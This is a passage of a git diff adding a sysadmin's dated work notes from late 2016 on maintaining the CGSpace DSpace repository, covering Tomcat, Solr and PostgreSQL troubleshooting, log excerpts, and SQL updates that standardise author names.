+g1774+OR+g1782+OR+g1794+OR+g1796+OR+g1797+OR+g1814+OR+g1818+OR+g1826+OR+g1853+OR+g1855+OR+g1857+OR+g1858+OR+g1859+OR+g1860+OR+g1861+OR+g1863+OR+g1864+OR+g1865+OR+g1867+OR+g1869+OR+g1871+OR+g1873+OR+g1875+OR+g1877+OR+g1879+OR+g1881+OR+g1883+OR+g1884+OR+g1885+OR+g1887+OR+g1889+OR+g1891+OR+g1892+OR+g1894+OR+g1896+OR+g1898+OR+g1900+OR+g1902+OR+g1907+OR+g1910+OR+g1915+OR+g1916+OR+g1917+OR+g1918+OR+g1929+OR+g1931+OR+g1932+OR+g1933+OR+g1934+OR+g1936+OR+g1937+OR+g1938+OR+g1939+OR+g1940+OR+g1942+OR+g1944+OR+g1945+OR+g1948+OR+g1950+OR+g1955+OR+g1961+OR+g1962+OR+g1964+OR+g1966+OR+g1968+OR+g1970+OR+g1972+OR+g1974+OR+g1976+OR+g1979+OR+g1982+OR+g1984+OR+g1985+OR+g1986+OR+g1987+OR+g1989+OR+g1991+OR+g1996+OR+g2003+OR+g2007+OR+g2011+OR+g2019+OR+g2020+OR+g2046)&sort=dateIssued.year_sort+desc&rows=1&wt=javabin&version=2} hits=56080 status=0 QTime=3
+
    +
  • According to some old threads on the DSpace Tech mailing list, this means that the user has a lot of permissions (from groups or on the individual eperson), which increases the Solr query size / query URL
  • +
  • It might be fixed by increasing the Tomcat maxHttpHeaderSize, which is 8192 (or 8KB) by default
  • +
  • I’ve increased the maxHttpHeaderSize to 16384 on DSpace Test (see the connector sketch after this list) and the user said he is now able to see the communities on the homepage
  • +
  • I will make the changes on CGSpace soon
  • +
  • A few users are reporting issues with their workflows; they get the following message: “You are not allowed to perform this task”
  • +
  • Might be the same as DS-2920 on the bug tracker
  • +
+
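  • For reference, the change is a Connector attribute in Tomcat’s server.xml; a minimal sketch (the port and other attributes here are generic assumptions):

<Connector port="8081" protocol="HTTP/1.1"
           connectionTimeout="20000"
           URIEncoding="UTF-8"
           maxHttpHeaderSize="16384" />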

2016-11-30

+
    +
  • The maxHttpHeaderSize fix worked on CGSpace (user is able to see the community list on the homepage)
  • +
  • The “take task” cache fix worked on DSpace Test but it’s not an official patch, so I’ll have to report the bug to DSpace people and try to get advice
  • +
  • More work on the KM4Dev Journal article
  • +
diff --git a/docs/2016-12/index.html b/docs/2016-12/index.html
new file mode 100644
index 000000000..177f0c3f1
--- /dev/null
+++ b/docs/2016-12/index.html
@@ -0,0 +1,838 @@

December, 2016

+ +
+

2016-12-02

+
    +
  • CGSpace was down for five hours in the morning while I was sleeping
  • +
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • +
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
    +
  • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
  • +
  • I’ve raised a ticket with Atmire to ask
  • +
  • Another worrying error from dspace.log is:
  • +
+
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
+        at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
+        at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:882)
+        at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:789)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:646)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:727)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:111)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:274)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)
+        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)
+        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)
+        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:170)
+        at com.googlecode.psiprobe.Tomcat70AgentValve.invoke(Tomcat70AgentValve.java:44)
+        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:98)
+        at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:180)
+        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)
+        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)
+        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1041)
+        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)
+        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:313)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+        at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
+        at com.atmire.statistics.generator.TopNDSODatasetGenerator.toDatasetQuery(SourceFile:39)
+        at com.atmire.statistics.display.StatisticsDataVisitsMultidata.createDataset(SourceFile:108)
+        at org.dspace.statistics.content.StatisticsDisplay.createDataset(SourceFile:384)
+        at org.dspace.statistics.content.StatisticsDisplay.getDataset(SourceFile:404)
+        at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generateJsonData(SourceFile:170)
+        at com.atmire.statistics.mostpopular.JSONStatsMostPopularGenerator.generate(SourceFile:246)
+        at com.atmire.app.xmlui.aspect.statistics.JSONStatsMostPopular.generate(JSONStatsMostPopular.java:145)
+        at sun.reflect.GeneratedMethodAccessor296.invoke(Unknown Source)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+        at com.sun.proxy.$Proxy96.process(Unknown Source)
+        at org.apache.cocoon.components.treeprocessor.sitemap.ReadNode.invoke(ReadNode.java:94)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+        at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
+        at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
+        at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
+        at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
+        at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
+        at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
+        at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
+        at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
+        at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
+        at javax.servlet.http.HttpServlet.service(HttpServlet.java:727)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
+        at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
+        at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
+        at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
+        at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:202)
+        at com.sun.proxy.$Proxy89.service(Unknown Source)
+        at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+        at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1180)
+        at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:950)
+        ... 35 more
+
    +
  • The first error I see in dspace.log this morning is:
  • +
+
2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;"b0b541c1-ec15-48bf-9209-6dbe8e338cdc"
+org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
+
    +
  • Looking through DSpace’s Solr log I see that, about 20 seconds before this, there were a few 30+ KiB Solr queries
  • +
  • The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:
  • +
+
2016-12-02 03:00:42,606 INFO  org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&fq=-isInternal:true&fq=-(author_mtdt:"CGIAR\+Institutional\+Learning\+and\+Change\+Initiative"++AND+subject_mtdt:"PARTNERSHIPS"+AND+subject_mtdt:"RESEARCH"+AND+subject_mtdt:"AGRICULTURE"+AND+subject_mtdt:"DEVELOPMENT"++AND+iso_mtdt:"en"+)&rows=0&wt=javabin&version=2} hits=0 status=0 QTime=19
+2016-12-02 08:28:23,908 INFO  org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
+
    +
  • DSpace’s own Solr logs don’t give IP addresses, so I will have to enable Nginx’s logging of /solr so I can see where this request came from
  • +
  • I enabled logging of /rest/ and I think I’ll leave it on for good (see the sketch after this list)
  • +
  • Also, the disk is nearly full because of log file issues, so I’m running some compression on DSpace logs
  • +
  • Normally these stay uncompressed for a month just in case we need to look at them, so now I’ve just compressed anything older than 2 weeks so we can get some disk space back
  • +
+
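  • A minimal sketch of the kind of nginx location/access_log pair this refers to (the log path and upstream name are assumptions):

location /rest/ {
    access_log /var/log/nginx/rest.log;
    proxy_pass http://tomcat_http;
}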

2016-12-04

+
    +
  • I got a weird report from the CGSpace checksum checker this morning
  • +
  • It says 732 bitstreams have potential issues, for example:
  • +
+
------------------------------------------------ 
+Bitstream Id = 6
+Process Start Date = Dec 4, 2016
+Process End Date = Dec 4, 2016
+Checksum Expected = a1d9eef5e2d85f50f67ce04d0329e96a
+Checksum Calculated = a1d9eef5e2d85f50f67ce04d0329e96a
+Result = Bitstream marked deleted in bitstream table
+----------------------------------------------- 
+...
+------------------------------------------------ 
+Bitstream Id = 77581
+Process Start Date = Dec 4, 2016
+Process End Date = Dec 4, 2016
+Checksum Expected = 9959301aa4ca808d00957dff88214e38
+Checksum Calculated = 
+Result = The bitstream could not be found
+----------------------------------------------- 
+
    +
  • The first one seems ok, but I don’t know what to make of the second one…
  • +
  • I had a look and there is indeed no file with the second checksum in the assetstore (ie, looking in [dspace-dir]/assetstore/99/59/30/...)
  • +
  • For what it’s worth, there is no item on DSpace Test or S3 backups with that checksum either…
  • +
  • In other news, I’m looking at JVM settings from the Solr 4.10.2 release, from bin/solr.in.sh:
  • +
+
# These GC settings have shown to work well for a number of common Solr workloads
+GC_TUNE="-XX:-UseSuperWord \
+-XX:NewRatio=3 \
+-XX:SurvivorRatio=4 \
+-XX:TargetSurvivorRatio=90 \
+-XX:MaxTenuringThreshold=8 \
+-XX:+UseConcMarkSweepGC \
+-XX:+UseParNewGC \
+-XX:ConcGCThreads=4 -XX:ParallelGCThreads=4 \
+-XX:+CMSScavengeBeforeRemark \
+-XX:PretenureSizeThreshold=64m \
+-XX:CMSFullGCsBeforeCompaction=1 \
+-XX:+UseCMSInitiatingOccupancyOnly \
+-XX:CMSInitiatingOccupancyFraction=50 \
+-XX:CMSTriggerPermRatio=80 \
+-XX:CMSMaxAbortablePrecleanTime=6000 \
+-XX:+CMSParallelRemarkEnabled \
+-XX:+ParallelRefProcEnabled \
+-XX:+AggressiveOpts"
+
+

2016-12-05

+
    +
  • I did some basic benchmarking on a local DSpace before and after the JVM settings above, but there wasn’t anything amazingly obvious
  • +
  • I want to make the changes on DSpace Test and monitor the JVM heap graphs for a few days to see if they change the JVM GC patterns or anything (munin graphs)
  • +
  • Spin up new CGSpace server on Linode
  • +
  • I did a few traceroutes from Jordan and Kenya and it seems that Linode’s Frankfurt datacenter is a few hops closer and perhaps has less packet loss than the London one, so I put the new server in Frankfurt
  • +
  • Do initial provisioning
  • +
  • Atmire responded about the MQM warnings in the DSpace logs
  • +
  • Apparently we need to change the batch edit consumers in dspace/config/dspace.cfg:
  • +
+
event.consumer.batchedit.filters = Community|Collection+Create
+
    +
  • I haven’t tested it yet, but I created a pull request: #289
  • +
+

2016-12-06

+
    +
  • Some author authority corrections and name standardizations for Peter:
  • +
+
dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+UPDATE 11
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+UPDATE 36
+dspace=# update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+UPDATE 14
+dspace=# update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+UPDATE 42
+dspace=# update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+UPDATE 360
+dspace=# update metadatavalue set text_value='Grace, Delia', authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+UPDATE 561
+
    +
  • Pay attention to the regex to prevent false positives in tricky cases with Dutch names!
  • +
  • I will run these updates on DSpace Test and then force a Discovery reindex, and then run them on CGSpace next week
  • +
  • More work on the KM4Dev Journal article
  • +
  • In other news, it seems the batch edit patch is working: there are no more WARN errors in the logs and batch edits seem to work
  • +
  • I need to check the CGSpace logs to see if there are still errors there, and then deploy/monitor it there
  • +
  • Paola from CCAFS mentioned she also has the “take task” bug on CGSpace
  • +
  • Reading about shared_buffers in PostgreSQL configuration (default is 128MB)
  • +
  • Looks like we have ~5GB of memory used by caches on the test server (after OS and JVM heap!), so we might as well bump up the buffers for Postgres
  • +
  • The docs say a good starting point for a dedicated server is 25% of the system RAM, and our server isn’t dedicated (it also runs Solr, which can benefit from the OS cache), so let’s try 1024MB (see the sketch below)
  • +
  • In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):
  • +
+
$ time JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace index-authority
+Retrieving all data
+Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
+Exception: null
+java.lang.NullPointerException
+        at org.dspace.authority.AuthorityValueGenerator.generateRaw(AuthorityValueGenerator.java:82)
+        at org.dspace.authority.AuthorityValueGenerator.generate(AuthorityValueGenerator.java:39)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.prepareNextValue(DSpaceAuthorityIndexer.java:201)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:132)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:159)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.DSpaceAuthorityIndexer.hasMore(DSpaceAuthorityIndexer.java:144)
+        at org.dspace.authority.indexer.AuthorityIndexClient.main(AuthorityIndexClient.java:61)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+
+real    8m39.913s
+user    1m54.190s
+sys     0m22.647s
+
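  • For the record, the shared_buffers experiment mentioned above is a single line in postgresql.conf (the path is assumed):

# /etc/postgresql/9.5/main/postgresql.conf (path assumed)
shared_buffers = 1024MB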

2016-12-07

+
    +
  • For what it’s worth, after running the same SQL updates on my local test server, index-authority runs and completes just fine
  • +
  • I will have to test more
  • +
  • Anyways, I noticed that some of the authority values I set actually have versions of author names we don’t want, ie “Grace, D.”
  • +
  • For example, do a Solr query for “first_name:Grace” and look at the results
  • +
  • Querying that ID shows the fields that need to be changed:
  • +
+
{
+  "responseHeader": {
+    "status": 0,
+    "QTime": 1,
+    "params": {
+      "q": "id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+      "indent": "true",
+      "wt": "json",
+      "_": "1481102189244"
+    }
+  },
+  "response": {
+    "numFound": 1,
+    "start": 0,
+    "docs": [
+      {
+        "id": "0b4fcbc1-d930-4319-9b4d-ea1553cca70b",
+        "field": "dc_contributor_author",
+        "value": "Grace, D.",
+        "deleted": false,
+        "creation_date": "2016-11-10T15:13:40.318Z",
+        "last_modified_date": "2016-11-10T15:13:40.318Z",
+        "authority_type": "person",
+        "first_name": "D.",
+        "last_name": "Grace"
+      }
+    ]
+  }
+}
+
    +
  • I think I can just update the value, first_name, and last_name fields…
  • +
  • The update syntax should be something like this, but I’m getting errors from Solr:
  • +
+
$ curl 'localhost:8081/solr/authority/update?commit=true&wt=json&indent=true' -H 'Content-type:application/json' -d '[{"id":"1","price":{"set":100}}]'
+{
+  "responseHeader":{
+    "status":400,
+    "QTime":0},
+  "error":{
+    "msg":"Unexpected character '[' (code 91) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1]",
+    "code":400}}
+
    +
  • When I try using the XML format I get an error that the updateLog needs to be configured for that core (Solr’s atomic updates require the updateLog to be enabled in the core’s solrconfig.xml)
  • +
  • Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?
  • +
+
dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+UPDATE 561
+
    +
  • Then I’ll reindex discovery and authority and see how the authority Solr core looks
  • +
  • After this, there are authorities for some of the “Grace, D.” and “Grace, Delia” text_values in the database (the first is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new):
  • +
+
$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&wt=json&indent=true'
+{
+  "responseHeader":{
+    "status":0,
+    "QTime":0,
+    "params":{
+      "q":"id:18ea1525-2513-430a-8817-a834cd733fbc",
+      "indent":"true",
+      "wt":"json"}},
+  "response":{"numFound":1,"start":0,"docs":[
+      {
+        "id":"18ea1525-2513-430a-8817-a834cd733fbc",
+        "field":"dc_contributor_author",
+        "value":"Grace, Delia",
+        "deleted":false,
+        "creation_date":"2016-12-07T10:54:34.356Z",
+        "last_modified_date":"2016-12-07T10:54:34.356Z",
+        "authority_type":"person",
+        "first_name":"Delia",
+        "last_name":"Grace"}]
+  }}
+
    +
  • So now I could set them all to this ID and the name would be ok, but there has to be a better way!
  • +
  • In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!
  • +
  • Better to use:
  • +
+
dspace=# update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+
    +
  • This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!
  • +
  • Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID
  • +
  • Deploy MQM WARN fix on CGSpace (#289)
  • +
  • Deploy “take task” hack/fix on CGSpace (#290)
  • +
  • I ran the following author corrections and then reindexed discovery:
  • +
+
update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
+update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
+update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
+update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
+update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
+

2016-12-08

+
    +
  • Something weird happened and Peter Thorne’s names all ended up as “Thorne”, I guess because the original authority had that as its name value:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
+    text_value    |              authority               | confidence
+------------------+--------------------------------------+------------
+ Thorne, P.J.     | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+ Thorne           | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+ Thorne-Lyman, A. | 0781e13a-1dc8-4e3f-82e8-5c422b44a344 |         -1
+ Thorne, M. D.    | 54c52649-cefd-438d-893f-3bcef3702f07 |         -1
+ Thorne, P.J      | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+ Thorne, P.       | 18349f29-61b1-44d7-ac60-89e55546e812 |        600
+(6 rows)
+
    +
  • I generated a new UUID using uuidgen | tr [A-Z] [a-z] and set it, along with the correct name variation, for all records:
  • +
+
dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
+UPDATE 43
+
    +
  • Apparently we also need to normalize Phil Thornton’s names to Thornton, Philip K.:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+     text_value      |              authority               | confidence
+---------------------+--------------------------------------+------------
+ Thornton, P         | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P K.      | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P K       | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton. P.K.      | 3e1e6639-d4fb-449e-9fce-ce06b5b0f702 |         -1
+ Thornton, P K .     | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P.K.      | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P.K       | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, Philip K  | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, Philip K. | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+ Thornton, P. K.     | 0d8369bb-57f7-4b2f-92aa-af820b183aca |        600
+(10 rows)
+
    +
  • Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:
  • +
+
dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
+UPDATE 362
+
    +
  • It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)
  • +
  • Everything looks ok after authority and discovery reindex
  • +
  • In other news, I think we should really be using more RAM for PostgreSQL’s shared_buffers
  • +
  • The PostgreSQL documentation recommends using 25% of the system’s RAM on dedicated systems, but we should use a bit less since we also have a massive JVM heap and also benefit from some RAM being used by the OS cache
  • +
+

2016-12-09

+
    +
  • More work on finishing rough draft of KM4Dev article
  • +
